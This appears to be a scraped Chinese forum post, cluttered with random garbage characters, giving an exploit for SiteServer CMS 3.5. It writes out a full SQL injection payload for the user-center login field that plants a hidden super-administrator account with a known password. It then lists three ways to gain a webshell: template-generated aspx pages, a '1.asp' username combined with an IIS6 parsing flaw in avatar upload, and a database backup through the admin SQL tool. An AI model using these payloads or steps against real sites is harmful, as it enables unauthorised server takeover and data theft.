经测试秒杀最新的3.5版
9 G" ~# P# }/ t$ a: H; i1 Wstieserver官网:www.siteserver.cn
$ t# H/ X) y) ^& `+ C! G) ZEXP:3 J5 ^3 s9 K0 h1 Q, Z: d$ W' k$ d
直接访问UserCenter/login.aspx
4 D% E1 z, X5 ~用户名处输入:
; P" \5 G! d% h4 L9 f
! ^6 l1 w( C6 f' Q123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
, [+ N' a0 h& j9 `密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
) v( D# a' P- i' N/ y. C+ j- _; M之后再访问后台SiteServer/login.aspx用插入的用户登陆* i, C# ]5 o- k
后台拿webshell的三种方法:
5 U$ [% ?5 U5 d; }& o* U一、
$ b! Z/ O5 @2 q% \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx2 u( W8 P r$ Y+ x- C4 n# ~
二、
8 @5 F! ~4 m1 s5 m; V9 M$ } |成员权限-》添加用户-》用户名为:1.asp
& l+ M* `% a+ N" B" F" }http://127.0.0.1/usercenter/, N0 D9 h$ o8 {9 g' I$ F) l; x! @
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
# A% I6 j9 o3 R5 O; c(ps:后台添加用户时不会验证是否含有非法字符)- n3 _# p7 m- X1 {
三、+ s1 Y% N' L' d# c6 R* x
系统工具-》实用工具-》机器参数查看
( t- k& H! W' @9 V6 Q) d! N可以看到数据库类型、名称,WEB路径9 m+ m7 V! d% u$ h9 H$ ^" f
系统工具-》数据库工具-》SQL语句查询
# c* F# G% G4 o% u7 J" [6 R- [这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |